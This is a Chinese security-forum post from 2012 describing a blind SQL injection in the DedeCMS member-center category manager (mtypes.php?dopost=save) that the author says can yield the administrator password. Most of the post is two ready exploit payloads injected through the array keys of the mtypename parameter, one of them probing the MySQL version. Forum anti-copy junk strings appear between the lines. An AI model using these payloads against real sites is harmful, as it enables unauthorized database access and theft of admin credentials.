中国网络渗透测试联盟
标题:
DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
[打印本页]
作者:
admin
时间:
2012-12-20 08:08
标题:
DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
需要magic_quotes_gpc = Off,所以说是鸡肋啊.
; P% I3 P% T# v/ T
1 V- F6 K; n6 j* ]/ N) [
& F1 B) ~* i" z n7 [% K$ U+ \0 q5 ?
发生在数组key里的注射漏洞,有点意思.
) M" m3 ~) W+ m" k
8 ~/ L% r+ C/ V, a) r: z
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
2 U/ u, U% G1 f3 ]8 B; }
. G" K" f+ I0 t* r2 B' W( p
http://www.xxx.com
/dede/member/mtypes.php?dopost=save
6 ^) @9 e& E4 p$ f
8 A" H2 ` Z2 P4 @+ \0 T7 [( Y$ W# _
exploit:
* D1 L B5 c+ K0 r4 ]
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
8 `* s& z7 W* _
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
1 h k G" l8 P2 {1 c/ p
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2